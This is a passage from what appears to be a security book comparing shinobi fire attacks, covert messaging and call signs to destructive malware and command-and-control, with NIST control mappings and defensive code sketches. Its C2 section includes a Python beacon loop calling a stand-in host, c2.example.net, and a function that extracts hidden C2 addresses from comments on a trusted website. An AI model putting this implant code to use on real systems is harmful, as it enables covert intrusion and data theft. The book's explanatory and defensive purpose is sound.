threat. [CM-2: Baseline Configuration | (7) Configure Systems

and Components for High-Risk Areas; SC-34: Non-Modifiable

Executable Programs]

5. Provide training and simulated exercises for your forensic staff

to facilitate effective responses in the event of a security incident.

[IR-2: Incident Response Training | (1) Simulated Events]

6. Establish a forensic analysis team with the capability and authori-

zation to conduct real-time forensic collection and investigation.

[IR-10: Integrated Information Security Analysis Team]

7. Use safeguards to validate that forensic systems, software, and

hardware have not been tampered with. [SA-12: Supply Chain

Risk Management | (10) Validate as Genuine and Not Altered |

(14) Identity and Traceability]


Debrief

In this chapter, we reviewed the shinobi techniques of capturing and

interrogating enemy shinobi, as well as tactics used to evade capture. We

touched on how collecting more forensic evidence gives the threat actor

more opportunities to feed investigators false data points—and why it can

be better to interact with live threats. We discussed best practices around

forensic capabilities to gain visibility into threats, along with advanced

techniques, such as ambushes and traps, for confronting threats.

In the next chapter, we will discuss the most destructive mode of

attack in the shinobi’s arsenal: attacking with fire.

17

F I R E A T T A C K

First, it is easy to set fires; second, it is not easy for the

enemy to put out the fire; and third, if your allies are coming

to attack the castle at the same time, the enemy will lose any

advantage as the fortifications will be understaffed.

If you are going to set fire to the enemy’s castle or camp, you need

to prearrange the ignition time with your allies.

—Yoshimori Hyakushu #83

One of the most impactful things a shinobi could do after

infiltrating a castle or fortification was start a fire—ideally

in or around gunpowder storehouses, wood stores, food

or supply depots, or bridges. A well-set fire spread quickly

while staying out of sight; could not be contained or extin-

guished easily; and became an immediate danger to the

castle’s integrity, supplies, and inhabitants. Castle defend-

ers were forced to choose between putting out the flames

and fighting the enemy army signaled to attack by the


arsonist. Attempting to fight both battles at once weakened a target’s abil-

ity to do either. Those who fought the fire were easily overtaken by the

advancing soldiers, while those who ignored the fire to take up arms ulti-

mately lost the battle no matter how well they fought.1

The scrolls talk at length about fire attacks, including the various

tools, tactics, and skills used to execute them. Before an attack, shinobi

studied a castle’s inhabitants to determine when they slept or when key

positions went unguarded. They then worked with other invaders to

coordinate timing. Shinobi engineered numerous custom tools for these

attacks, such as fire arrows, covert fire-holding cylinders, land mines,

bombs, and throwable torches.2 Among the most visually dynamic weap-

ons were “heat horses”—horses with special torches tied to their saddles

and set loose to run wildly inside fortifications, spreading fire chaotically,

distracting guards and inhabitants, and proving difficult to contain.

Amid the confusion, shinobi communicated with forces concealed out-

side the castle to cue the attack once the fire had sufficiently spread.3

While medieval armies had the capability to initiate a fire attack

from afar—by deploying archers to shoot fire arrows, for example—

Bansenshūkai recommends that commanders employ shinobi to set the

fire instead. Compared to external attacks, fires set by shinobi would not

be spotted and extinguished as quickly. Also, the shinobi could set them

near combustible or strategically valuable items, and an agent could feed

them until they grew.4

The success of fire attacks made them ubiquitous in feudal Japan,

so many castles began implementing targeted countermeasures. These

included fireproofing fortifications with dozo-zukuri (“fireproofing with

plaster”) or fire-resistant lacquer,5 building with fireproof or fire-resistant

materials such as clay or rock, using fire-resistant roof tiles, establishing

fire watch teams, and creating firebreaks by designating inconsequential

buildings (i.e., buildings that could be sacrificed to prevent fire from

spreading to critical infrastructure).6 Guards were also warned that

fires might be purposeful distractions


to facilitate theft, attack, or other

actions7 (advice later mirrored in the Gunpo Jiyoshu manual8).

It is important to remember that shinobi did not have automatic light-

ers and that defenders kept a constant lookout for arsonists (much like

modern organizations that maintain antivirus and threat detection every-

where). Shinobi engineered ingenious methods to deliver fire covertly,

weaponize it, and exploit combustible targets. When imagining how

cyberattacks could be delivered and weaponized against targets, keep shi-

nobi ingenuity with fire attacks in mind.

In this chapter, we will review how, in the context of cyberwar, shi-

nobi fire attacks are surprisingly similar to modern hybrid tactics. Fire is


a great analogy for wormable/self-propagating cyberattacks, as it spreads

to everything it can touch. We will review examples of destructive cyberat-

tacks, as well as how modern adversaries time and coordinate them. We

will touch on the various defenses that organizations use to prevent, miti-

gate, contain, and recover from cyberattacks. Takeaways from this chap-

ter can be applied to firewalls, as well as new, more advanced network

defense strategies.

Destructive Cyber Attacks

Not long after computers were able to connect and communicate with

each other, self-propagating viruses and worms were born. Destructive

attacks have only gotten more prolific with time. Now, a destructive attack

on one organization’s network can quickly spread like fire, destroying

systems and data across the internet. Considering the growing intercon-

nectedness of systems in cyberspace as well as inherent security flaws, a

network or machine connected to the internet without patches or other

safeguards is basically kindling just waiting to be lit.

In the early 2000s, the industry saw its first ransomware attacks. In

these attacks, malware encrypts a system or network’s data (and deletes

the backups) until the target pays to decrypt them. These viruses

quickly spread from systems to network storage to the cloud, holding

data hostage or, in the case of nonpayment, destroying it through encryp-

tion. Like ninja fire attacks, ransomware is often used to distract from

bigger gambits. For example, adversaries (believed to be North Korean)

deployed the FEIB Hermes ransomware attack to divert cyber defenders’

attention while the attackers executed the SWIFT financial attack, which

netted them millions of dollars.9

Next came wiper malware attacks, in which the adversary plants “time

bomb” viruses in multiple systems to delete all system data and wipe backups

at a specified, opportune time. One example is the Shamoon virus, which

is believed to have been conducted by Iranian threat actors against Saudi

Arabia and was launched at the start of a weekend holiday to destroy data

and disable industrial oil systems.10

Recently, attackers have deployed sabotage malware against indus-

trial control systems, giving the attackers the capability to read sensors

or control mechanical switches, solenoids, or other physical actuators that

operate blast furnaces,11 electrical grids,12 anti–air defense systems,13 and

nuclear centrifuges.14 Such an attack could disable these critical systems

or cause them to malfunction, potentially leading to explosions, other

physical destruction, or simultaneous kinetic attacks.


Administrative efforts to prevent the spread of attacks include reduc-

ing the attack surface by hardening systems so that when systems are

attacked, fine-tuned security controls limit the damage. Also useful is

resiliency, in which multiple backups of systems and data in other loca-

tions and networks give organizations a fallback when a cyberattack suc-

cessfully compromises the primary systems. (Sometimes these backups

are even analog or manual systems.)

More technical defense solutions include placing firewalls on the perim-

eter of the network. However, if an attacker bypasses them, infiltrates the

network, and starts a self-propagating destructive attack, a firewall may let

the attack get outside of its network; in other words, firewalls are typically

designed to block incoming attacks, not outgoing attacks. Other efforts

to detect and stop destructive attacks include antivirus software, intrusion

prevention systems (IPS), host intrusion detection systems (HIDS), and

Group Policy Objects (GPO). Such technical safeguards might immediately

identify a destructive attack, respond to it, and neutralize it, but they are

typically signature based and therefore not always effective.

A newer approach is cyber insurance, which is an agreement that

protects an organization from the legal and financial fallout of a breach.

While such an insurance policy may mitigate an organization’s liability in

the case of a cyberattack, it does not defend against attacks, just like fire

insurance does not defend against flames.

Arguably the best option for defense against destructive attacks

includes strict network segregation and isolation (air gapping) to limit

resource access and prevent the spread of a self-propagating virus. While

this is an exceptionally effective way to block a cyberattack, it is not always

feasible given its potentially high impact on business functions. Also, it

can be bypassed by sneakernets and insider threats.

Safeguards from (Cyber) Fire Attacks

It is common for organizations to procure fire insurance and to pursue

fire prevention and containment strategies. However, for whatever rea-

son, some organizations purchase cyber insurance without implementing

safeguards against cyberattacks. It may be that they don’t see the same

level of risk from cyberattacks as from a real fire where, after all, property

and even human life are at stake. But with the growth of the Internet of

Things (IoT) and the increasing convergence of the physical world with

cyberspace, risks will only increase. Taking the following defensive mea-

sures may be immensely helpful to your organization:

1. Conduct cyber fire drills. Simulate destructive attacks to test

backups, failovers, responsiveness, recovery, and the ability to


“evacuate” data or systems in a timely fashion. This exercise

differs from disaster recovery or backup tests in that, rather than

an imagined threat scenario, an active simulated threat is inter-

acting with the network. (Take measures such as encrypting data

with a known key to ensure that you don’t destroy any data dur-

ing the exercises.)

Netflix runs a perpetual exercise called “Chaos Monkey”

that randomly disconnects servers, breaks configurations, and

turns off services. The organization is therefore constantly test-

ing that it can smoothly and immediately load balance or fail

over to backups without issue. In the event of a real problem,

the security team has already designed and tested workable

solutions. Netflix has released Chaos Monkey to the public

for free, so any organization can use it to improve the abil-

ity to detect, resist, respond to, and recover from destructive

attacks.15

2. (Cyber) fireproof systems. Dedicate resources to studying how a

selected destructive attack spreads, what it destroys, and what

makes your systems vulnerable to it. Implement read-only hard

drive adapters that conduct operations in the hard drive buffer,

keeping the data locked “behind glass” and incapable of being

destroyed because nothing can interact with it in its read-only

state. Remove the “combustible” software: applications, librar-

ies, functions, and other system components that are known to

spread destructive attacks.

A commercial opportunity exists to develop specialized soft-

ware, hardware, and devices that cyber fireproof systems. These

applications could have a large market impact by making servers

or data resistant to destructive attacks, or at least slowing or halt-

ing their progress.

3. Set cyber firetraps. There is a large market opportunity for creating automated denial and deception “cyber firetraps” that lure

adversaries or malicious programs into infinite loops or trigger

mechanisms that cause the attack to quarantine, extinguish, or

contain itself. One clever, publicly reported defense is to set up

folders on network shares with infinitely recursive directories;

when malware tries to iterate over folders to find more data, it

gets stuck in a never-ending loop.16 Specialized sensors could be

deployed to locate this behavior. They could then either alert

incident response teams or trigger a command to kill the process

that initiated the infinite directory. (A minimal sketch of this trap appears after this list.)


4. Create dynamic cyber firebreak/cut lines. Cyberattacks spread so easily

because systems are typically powered on and connected to each

other. While an attack may not be able to directly compromise a

given system, it can spread to other, interconnected systems. This

is repeatedly demonstrated by the hundreds of thousands (if not

millions) of botnets, worms, and other self-spreading malware in

cyberspace.

While most network segregation and isolation happens

through statically designed architecture, IT organizations can

implement additional manual and software-based “break” lines.

Some organizations have been known to install a master solenoid

switch that manually disconnects the organization from the inter-

net. Internal intranet communications continue, but all external

network connections immediately disconnect, creating a physi-

cal air gap. The need for this capability might seem extreme or

unlikely, but in the event of a global “cyber fire,” the organization

has the option to quickly and easily break away from the threat

without using a fire axe to sever cables.

A twist on this implementation would see every system, room,

floor, and building with its own master switch, allowing security

staff to make quick decisions that thwart destructive attacks.

Upon hearing of an attack from leadership, staff could quickly

download any critical work documents and then flip their switch,

segregating their computer from the network and preventing the

spread of the attack.
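The recursive-directory firetrap from the third measure can be built with a single symbolic link. A minimal sketch in Python, assuming a Unix-like filesystem (the directory names are illustrative):

import os

def build_firetrap(root="decoy_share"):
    # Create a share whose "archive" folder loops back on itself.
    # Traversal code that follows symlinks descends forever; careful
    # tools that do not follow links (os.walk's default) are unaffected.
    os.makedirs(root, exist_ok=True)
    loop = os.path.join(root, "archive")
    if not os.path.islink(loop):
        os.symlink(".", loop)  # decoy_share/archive -> decoy_share

build_firetrap()

Pair the trap with a sensor that alerts when traversal depth under the share exceeds a sane bound; the alert, not the loop itself, is what lets responders extinguish the attack.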

CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside. You spend large parts of your fortune fireproofing your castle. You build it from stone, fortify it with all the newest fire defense technologies, and train your guards in how to respond to a fire.

In what ways are you still vulnerable to fire attack? For instance, how

might you protect or move your gunpowder stores? Could you isolate them

while satisfying your military advisers, who say that your army cannot defend

the castle without ready access to gunpowder? How would you fireproof

your food stores without ruining the food? How might you sanitize or filter

goods moving through your castle to prevent the circulation of combustible

materials? Where would you create firebreaks in your camps, barracks,

and other areas of the castle? What firetraps could you design to contain or


extinguish a spreading fire or to catch the arsonist? Can you design a fire

drill exercise that uses real fire to train your soldiers, but without exposing

your castle to risk?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of fire attacks in mind.

1. Monitor for indicators of destructive actions within your orga-

nization. Prevent tampering of system-monitoring logs, audit

events, and sensor data by forwarding data to segmented event

collectors. [AU-6: Audit Review, Analysis, and Reporting | (7)

Permitted Actions; AU-9: Protection of Audit Information; SI-4:

System Monitoring]

2. Implement network, system, and process segregation/isolation to

reduce the ability of destructive attacks to spread across your net-

work. [CA-3: System Interconnections; SC-3: Security Function

Isolation; SC-7: Boundary Protection | (21) Isolation of System

Components; SC-11: Trusted Path | (1) Logical Isolation; SC-39:

Process Isolation]

3. Conduct backup tests and resiliency exercises to determine

whether recovery mechanisms and fail-safes work as expected.

[CP-9: System Backup | (1) Testing for Reliability and Integrity |

(2) Test Restoration Using Sampling; CP-10: System Recovery and

Reconstitution | (1) Contingency Plan Testing]

4. Require dual authorization from qualified, authorized individu-

als before allowing commands that delete or destroy data. [CP-9:

System Backup | (7) Dual Authorization]

5. Implement measures to maintain your organization’s security

in the event of a destructive attack that causes security systems

to fail. For instance, configure firewalls that go offline to block

everything rather than allow everything, or configure systems

to go into “safe mode” when an attack is detected. [CP-12: Safe

Mode; SC-24: Fail in Known State]

6. Maintain media transport mechanisms that are safeguarded

against destructive attacks. For example, ensure that a hard drive


containing sensitive data is kept offline, disconnected, and stored

in a secure place where a physically destructive attack, such as

a real fire, could not compromise it. [MP-5: Media Transport;

PE-18: Location of System Components; SC-28: Protection of

Information at Rest]

7. Before connecting portable media or devices to your organiza-

tion’s systems or networks, test and scan them for evidence of

malicious software. [MP-6: Media Sanitization; SC-41: Port and

I/O Device Access]

8. Conduct risk assessments to determine which data and sys-

tems, if compromised, would most harm your organization.

Take advanced precautions with and install special safeguards

on those systems and data. [RA-3: Risk Assessment; SA-20:

Customized Development of Critical Components]

9. Build defenses such as malicious code protections and detonation

chambers to look for evidence of destructive attack capabilities.

[SC-44: Detonation Chambers; SI-3: Malicious Code Protection]

Debrief

In this chapter, we reviewed fire attacks and the various techniques shi-

nobi used to secretly carry flames and weaponize fire. We looked at sev-

eral high-profile cyberattacks, along with ways to defend against them.

We also looked more generally at ways in which cyber threats act like the

digital twin of fire attacks.

In the next chapter, we will discuss in detail how shinobi would com-

municate and coordinate with external allies to start a fire attack. Shinobi

accomplished covert command and control (C2) communication in a

multitude of clever ways—ways that parallel methods some malware uses

to perform C2 communication.

18

C O V E R T C O M M U N I C A T I O N

When a shinobi is going to communicate with the general after he has

gotten into the enemy’s castle, the shinobi needs to let his allies know

where he is. It is essential to arrange for the time and place to do this.

For success on a night attack, send shinobi in advance to know

the details of the enemy’s position before you give your orders.

—Yoshimori Hyakushu #12

Because shinobi were first and foremost experts in espio-

nage, they had to safely relay secret messages containing

scouting reports, attack plans, and other critical informa-

tion to help their lords and allies make informed tactical

and strategic decisions. Similarly, lords, generals, and

other shinobi needed to covertly tell an infiltrated shinobi

when to set a fire or execute other tactics. These messages

had to be easily deciphered by the recipient shinobi but

indiscernible to everyone else.

The Bansenshūkai, Ninpiden, and Gunpo Jiyoshu scrolls all describe

secret methods shinobi used to communicate with other shinobi, friendly


armies, or their employers after infiltrating enemy territory. Some are

brutally simple. The Bansenshūkai describes hiding a message in the belly

of a fish or even inside a person (use your imagination) who can easily

travel across borders without suspicion. Common choices were monks and

beggars. Obfuscation techniques discussed in the same scroll include cut-

ting a message into several pieces and sending each piece by a different

courier, to be reassembled by the recipient, as well as making inks from

tangerine juice, rusty water, sake, or castor oil that dry invisibly on paper

but are revealed with fire. Shinobi even developed the shinobi iroha—a

custom alphabet indecipherable to non-shinobi—and used fragmented

words or characters to create contextual ambiguity that only the shinobi

meant to receive the message would understand.1

A popular—and direct—method of sending secret messages was

yabumi, wherein what appears to be a normal arrow actually has a secret

scroll rolled around the bamboo shaft, along with marks on the fletch-

ing to identify the recipient. Given the logistical realities of feudal Japan,

shinobi could not always guarantee that they could fire a yabumi arrow at

a prearranged time and place, so they developed an arrow “handshake”

that, to an outsider, might have looked like a skirmish. If one side saw a

specific number of arrows shot rapidly at the same spot, they returned

fire with a specific number of arrows aimed to land in front of the

shooter. This signal and countersignal established a friendly connection.

The shinobi could then shoot the yabumi arrow, which would be picked

up and delivered to the intended target.2 This method of communica-

tion became so common that the Gunpo Jiyoshu manual warns that the

enemy may send deceptive letters by arrow; thus, the recipient should

closely examine yabumi messages using some of the linguistic techniques

described earlier in this book.3

For long-distance signaling or when sending a scroll wasn’t feasible,

shinobi devised flag, fire, smoke, and lamp signals (hikyakubi). When even

these were not possible, they employed secret drums, gongs, and conches.

A loud, unique blast of the signaling device told the shinobi inside enemy

lines to prepare to receive a secret communication. The exact signal pat-

tern was agreed upon one to six days before infiltration to avoid confu-

sion. After the initial hikyakubi signal, the message was delivered through

drum, gong, or conch signals.4

In this chapter, we will look at how the covert communication meth-

ods of the shinobi closely resemble modern malware command and

control communication. We will discuss why command and control com-

munications are needed and their role in threat activity. We’ll touch on

various techniques that modern adversaries have used to covertly conduct


this communication. We will also explore various defenses against this

technique and the challenges of using it. Lastly, we’ll list a large collec-

tion of security best practices to defend against command and control

communications. The fact that the shinobi scrolls offer no guidance

around how to stop covert communication suggests there may not be a

good solution for it.

Command and Control Communication

It is typically not feasible for malware to be wholly independent and

autonomous. If it were, the malware would be exceedingly large, complex,

suspicious, and visible to defenders. Rather, most malware needs tactical

guidance from its controllers during a threat campaign, so threat actors

use a technique called command and control (abbreviated as C2, CnC, or

C&C) to communicate with malware, backdoors, implants, and compro-

mised systems under their control in target networks. Operators use C2

communication to send commands to a compromised system, prompting

it to execute actions such as downloading data, updating its configura-

tion, or even deleting itself. The C2 implant can also initiate communica-

tion by sending statistics or valuable files, asking for new commands, or

beaconing back to report that the system is online, along with its location

and current status. Cyber threat actors often establish C2 infrastruc-

ture such as domain names, IPs, and websites one to six weeks prior to

infiltration.
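To make the check-in pattern concrete, here is a minimal Python sketch of a beacon loop of the kind an implant might run. Everything in it is hypothetical: the endpoint, the field names, and the ten-minute interval are invented for illustration and are not drawn from any real malware.

import json
import random
import time
import urllib.request

C2_URL = "https://c2.example.net/api/checkin"  # hypothetical endpoint

def beacon_once(host_id):
    # Report that the implant is alive and ask for the next command.
    payload = json.dumps({"host": host_id, "status": "online"}).encode()
    request = urllib.request.Request(
        C2_URL, data=payload, headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(request, timeout=10) as response:
        return json.loads(response.read().decode())  # e.g. {"cmd": "sleep"}

while True:
    try:
        command = beacon_once("workstation-42")
        # A real implant would dispatch on command["cmd"] here: download
        # data, update its configuration, or delete itself.
    except OSError:
        pass  # stay quiet on failure and retry at the next interval
    time.sleep(600 + random.randint(-60, 60))  # ~10 minutes, with jitter

Each element of the loop maps to a behavior described above: the check-in reports status, the response carries tasking, and the jittered sleep keeps the beacon from looking like a metronome.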

C2 functionality is widely known, and many firewalls, IDS/IPS, and

other security devices and controls can prevent adversaries from com-

municating directly to target systems or vice versa. To bypass these con-

trols, threat actors continually develop more advanced C2 techniques,

tactics, and procedures (TTPs). For example, C2 data can be embed-

ded in the payload of a ping or in commands hidden in pictures hosted

on public websites. Adversaries have used C2 in Twitter feeds and com-

ments on trusted sites. They have also used C2 to establish proxies and

email relays on compromised systems; they then communicate over

known protocols and safe sites that are not blocked by security controls

and devices. Phones plugged into compromised systems can be infected

with malware that, upon USB connection, “calls” the C2 via cell phone

towers, bypassing firewalls and other network defenses and facilitat-

ing communication between the infected host and the C2 while the

phone’s battery charges. Some C2 communication methods use blink-

ing LEDs (like a signal fire), vary CPU temperature (like a smoke sig-

nal), use the sounds of hard drives or PC speakers (like signal drums),


and leverage electromagnetic spectrum waves to bypass the air gap to a

nearby machine.

Threat actors layer C2 communications with obfuscation, encryption,

and other confidentiality techniques to maintain contact with a compro-

mised system without disclosing evidence of the commands to the victims.

Adversaries may avoid detection by:

• Limiting the amount of data that is communicated on a daily basis so the daily amount never seems anomalous (for example, 100MB max per day to mask downloading 1.4GB over two weeks)

• Sending or receiving beacons only during active user time to blend in with legitimate user traffic (for example, not beaconing very often in the small hours of the morning on a Sunday or holiday); a statistical check defenders can run against beacon timing follows this list

• Rotating to new, random, or dynamic C2 points to avoid statisti-

cal anomalies

• Regularly generating pseudo-legitimate traffic to avoid scrutiny

from behavior analysis

• Disabling or deleting activity logs to hide from forensics
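The flip side of these avoidance behaviors is that some of them leave statistical fingerprints. The sketch below, run here over invented timestamps, scores how regular the gaps between a host’s connections to one destination are; scores near zero suggest machine-driven beaconing rather than human browsing.

import statistics

def beacon_score(timestamps):
    """Coefficient of variation of inter-arrival times: values near 0
    mean metronome-like regularity; human traffic is far burstier."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if len(gaps) < 5:
        return None  # too few events to judge
    mean_gap = statistics.mean(gaps)
    return statistics.stdev(gaps) / mean_gap if mean_gap else None

# Hypothetical example: one connection roughly every 600 seconds.
times = [0, 598, 1203, 1799, 2405, 3001, 3597]
score = beacon_score(times)
if score is not None and score < 0.1:
    print(f"beacon-like traffic (CV={score:.3f}); review the destination")

An adversary who adds enough jitter will raise the score, so treat this as one weak signal among many rather than a verdict.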

Advanced C2 TTPs can be particularly sinister, virtually undetect-

able, and hard to block. Consider the example of a Windows IT admin

who has implemented such strict firewall controls that the only site they

can visit is technet.microsoft.com, the official Microsoft web portal for IT

professionals. Only the HTTPS protocol is allowed, antivirus is current

and running, and the operating system is fully patched. No external pro-

grams such as email, Skype, or iTunes are running; the only permitted destination is the Microsoft TechNet website, which the admin needs to do their job.

That may sound secure, but consider that Chinese APT17 (also called

Deputy Dog or Aurora Panda) encoded hidden IP addresses in comments

posted on Microsoft TechNet pages—comments that communicated with

a BLACKCOFFEE remote access trojan on a compromised system.5 If

anyone had inspected proxy traffic, behavior analysis, anomaly heuristics,

IDS signatures, antivirus, or firewall alerts, nothing notable would have

indicated that malicious communications were happening.
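To show how little there is for a proxy to flag, consider the following Python sketch. It fetches a page and looks for an IP address hidden between two marker strings inside an HTML comment. The page, the markers, and the encoding are invented; APT17’s actual scheme differed and is not reproduced here.

import re
import urllib.request

# Hypothetical markers bracketing an address hidden in a page comment,
# e.g. <!-- great post! @@203.0.113.77@@ -->
HIDDEN = re.compile(r"<!--.*?@@(\d{1,3}(?:\.\d{1,3}){3})@@.*?-->", re.S)

def find_hidden_ip(url):
    page = urllib.request.urlopen(url, timeout=10)
    html = page.read().decode("utf-8", errors="replace")
    match = HIDDEN.search(html)
    return match.group(1) if match else None

# An implant could call find_hidden_ip() against a trusted page and
# treat the result as its next C2 address. To every security device in
# the path, this is one ordinary HTTPS request to a reputable site.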

Advanced defense efforts to counter sophisticated C2s typically

involve air gapping the systems, but new C2 communication techniques

have been developed in recent years. One example is using a USB loaded

with rootkits or compromised firmware and malware that, once plugged

into a system, initiate communications with the implant on the compro-

mised system, collect the packaged data, and discreetly upload it for exfil-

tration to an external C2.


Controlling Coms

It is common for organizations to subscribe to multiple threat indicator feeds. These feeds continually supply the organization with malicious

URLs, IPs, and domains that have been observed working as C2s. The

organization will then alert and/or block those threats in their firewalls

and security devices. This is a good starting point for defending against

C2s, but there is an endless supply of new URLs, IPs, and domains, allow-

ing threat actors to take up new identities and evade the threat indicator

feeds. Both old and new approaches are needed to address C2s, some of

which are suggested below.

1. Follow best practices. While it may be impractical or even impossible

to prevent all C2 communications, you can block basic or moder-

ately advanced C2s by implementing cybersecurity best practices:

know your network, set boundary and flow controls, establish whitelists (a minimal whitelist sketch follows this list), and authorize hunt teams to proactively block or intercept C2 communications. Do not take shortcuts on best practices.

Rather, commit to doing solid security work. Document, test, and

validate your best practices and consult with independent third-

party assessors for additional measures and validation. Invest in

improving security while maintaining and bettering your existing

best-practice infrastructure.

2. Implement segmentation with “remote viewing” controls. Network seg-

mentation and isolation means establishing multiple networks

and machines, such as an intranet machine and an unclassi-

fied internet machine that are segmented from each other.

Segmentation should prevent C2 communication from bridg-

ing across boundaries. Unfortunately, it’s common for users to

briefly plug their intranet machine into the internet to download

documents or libraries or commit some other breach of security

protocol. One approach to such issues is to configure the intranet

machine so it remotely views another isolated machine that is

connected to the internet. The isolated internet box is not physi-

cally or directly accessible by users; they may issue commands and

view the screen, but they do not receive the actual raw informa-

tion from the isolated internet box in their remote viewing box.

The remote viewing box is effectively a TV monitor displaying

another computer in a different room. As such, C2 communica-

tion, malware, and exploits cannot jump through the video signal

to cause harm.
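As a toy illustration of the deny-by-default posture behind whitelisting, the following sketch checks outbound destinations against an approved list and logs everything else. The domain names are examples only, and real enforcement belongs in the proxy or firewall, not in application code.

ALLOWED_DESTINATIONS = {
    "technet.microsoft.com",      # example: the admin's one approved site
    "update.example-vendor.com",  # example: a patching service
}

def handle_outbound(hostname, audit_log):
    # Deny by default: anything not explicitly approved is blocked.
    if hostname in ALLOWED_DESTINATIONS:
        return True
    audit_log.append(f"DENY egress to {hostname}: not on approved list")
    return False

audit_log = []
for destination in ["technet.microsoft.com", "xk9-new-domain.example"]:
    handle_outbound(destination, audit_log)
print("\n".join(audit_log))

The denied entries are as valuable as the blocks themselves: a hunt team reviewing that log may find a C2 attempt before any alert fires.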


CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside. Every week, your scribes produce new scrolls that outline state secrets, new research and discoveries, financial data, and other sensitive information. It is imperative that these scrolls not end up in enemy hands. However, there are rumors that someone is making copies of important scrolls in your private library, and recent enemy actions seem to confirm these reports. None of the scribes or archivists are suspected of copying and exfiltrating the scrolls, so you are not looking for an insider threat.

What access restrictions or physical protections could you place on the scrolls to prevent their exfiltration or reproduction? How could you monitor for the theft or removal of these scrolls while still permitting the normal transit of goods and people to and from your castle? Could you store your scrolls in such a way that the enemy would not know which scrolls have the most value? What other ways might a threat actor obtain access to the scrolls—or steal the information without access—and how would you defend against them?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of C2s in mind.

1. Implement safeguards on systems, network boundaries, and

network egress points that look for signs of data exfiltration on

your network. This could mean blocking encrypted tunnels that

your sensors cannot intercept, along with looking for evidence

of unauthorized protocols, data formats, data watermarks, sensi-

tive data labels, and large files or streams exiting your network (a volume-check sketch follows this list).

[AC-4: Information Flow Enforcement | (4) Content Check

Encrypted Information; SC-7: Boundary Protection | (10) Prevent

Exfiltration; SI-4: System Monitoring | (10) Visibility of Encrypted

Communications]

2. Establish multiple networks with isolation and segmenta-

tion between internet and intranet resources. Restrict criti-

cal internal systems from connecting to the internet. [AC-4:

Information Flow Enforcement | (21) Physical and Logical


Separation of Information Flows; CA-3: System Interconnections

| (1) Unclassified National Security System Connections | (2)

Classified National Security System Connections | (5) Restrictions

on External System Connections; SC-7: Boundary Protection |

(1) Physically Separated Subnetworks | (11) Restrict Incoming

Communications Traffic | (22) Separate Subnets for Connecting

to Different Security Domains]

3. Restrict remote access to any systems with critical information.

[AC-17: Remote Access]

4. Implement restrictions and configuration controls to detect and

prevent unauthorized wireless communications. [AC-18: Wireless

Access | (2) Monitoring Unauthorized Connections; PE-19:

Information Leakage; SC-31: Covert Channel Analysis; SC-40:

Wireless Link Protection; SI-4: System Monitoring | (15) Wireless

to Wireline Communications]

5. Train your security team and employees to identify C2 com-

munications. [AT-3: Role-based Training | (4) Suspicious

Communications and Anomalous System Behavior; SI-4: System

Monitoring | (11) Analyze Communications Traffic Anomalies |

(13) Analyze Traffic and Event Patterns | (18) Analyze Traffic

and Covert Exfiltration]

6. Deny any unauthorized software that could be a C2 backdoor or

implant from running on your systems. [CM-7: Least Functionality

| (5) Authorized Software–Whitelisting]

7. Safeguard direct physical connections to systems that bypass

security controls and boundaries; these include switch closets,

Ethernet wall jacks, and computer interfaces. [PE-6: Monitoring

Physical Access; SC-7: Boundary Protection | (14) Protects Against

Unauthorized Physical Connections | (19) Block communication

from non-organizationally configured hosts]

8. Require inspection and scanning of removable media that enters

or leaves your organization to prevent personnel from manually

performing C2 communication through delivery and removal of

external media. [PE-16: Delivery and Removal]

9. Implement a whitelist to deny communication to any resource

or address that has not been approved for an exception. Many

C2 sites are brand-new domains with no history of legitimate use

by your organization. [SC-7: Boundary Protection | (5) Deny by

Default—Allow by Exception]
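To ground the exfiltration checks in item 1, here is a minimal sketch that totals per-host outbound volume from flow records and flags anything over a daily limit. The records, hostnames, and 100MB threshold are invented; tune any real limit to each host’s role.

from collections import defaultdict

# Hypothetical flow records for one day: (source host, bytes sent).
flows = [
    ("hr-laptop-7", 40_000_000),
    ("build-server", 900_000_000),
    ("hr-laptop-7", 70_000_000),
]

DAILY_LIMIT = 100_000_000  # 100MB; an example threshold, not a standard

totals = defaultdict(int)
for host, nbytes in flows:
    totals[host] += nbytes

for host, total in sorted(totals.items()):
    if total > DAILY_LIMIT:
        print(f"[exfil check] {host} sent {total / 1e6:.0f}MB today; investigate")

Recall the adversary behavior described earlier in this chapter: a patient operator will stay just under any fixed cap, so it also pays to trend per-host totals across weeks and question hosts that run close to the limit day after day.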


Debrief

In this chapter, we reviewed the various communication methods shi-

nobi used to receive and send commands to allies. We described various

modern C2 methods, along with their comparative shinobi methods.

However, we only scratched the surface, as it’s very likely that the most

sophisticated C2 techniques have yet to be discovered. Just like the best

of the shinobi’s covert communication methods were never written

down, we may never learn of the genius and creativity behind the most

advanced C2 techniques. We discussed several best practices, including

whitelisting and encryption inspection, as ways to mitigate an adversary’s

C2s, but an ideal solution to the problem remains to be found.

In the next chapter, we will discuss shinobi call signs. These were

methods of communicating with allies inside enemy territory by leaving

unique marks or messages. Similar to a dead drop, call signs never leave

the boundaries of an environment, so traditional methods of blocking or

detecting C2 communication generally do not work against them.

19

C A L L S I G N S

When you steal in, the first thing you should do is mark

the route, showing allies the exit and how to escape.

After you have slipped into the enemy’s area successfully, give more

attention to not accidentally fighting yourselves than to the enemy.

—Yoshimori Hyakushu #26

While shinobi are often portrayed in popular culture as

lone actors, many shinobi worked in teams. These teams

were particularly adept at discreetly relaying informa-

tion to each other in the field. The Gunpo Jiyoshu manual

describes three call signs, or physical markers, that the

shinobi developed to communicate with each other with-

out arousing suspicion. Based on what the markers were

and where they were placed, call signs helped shinobi

identify a target, marked which path they should take at a

fork in the road, provided directions to an enemy stronghold, or coordi-

nated an attack, among other actions. Though call signs were well known

within shinobi circles, participating shinobi agreed to custom variations

prior to a mission to ensure that targets or even enemy shinobi could not


recognize the call signs in the field. The scrolls suggest using markers

that are portable, disposable, quick to deploy and retract, and placed at

ground level. Most importantly, the markers had to be visually unique yet

unremarkable to the uninitiated.

For example, a shinobi might agree to inform their fellow shinobi

of their whereabouts by leaving dyed grains of rice in a predetermined,

seemingly innocuous location. One shinobi would leave red rice, another

green, and so on, so that when a fellow shinobi saw those few colored

grains, they would know their ally had already passed through. The

beauty of the system was that, while the shinobi could quickly identify

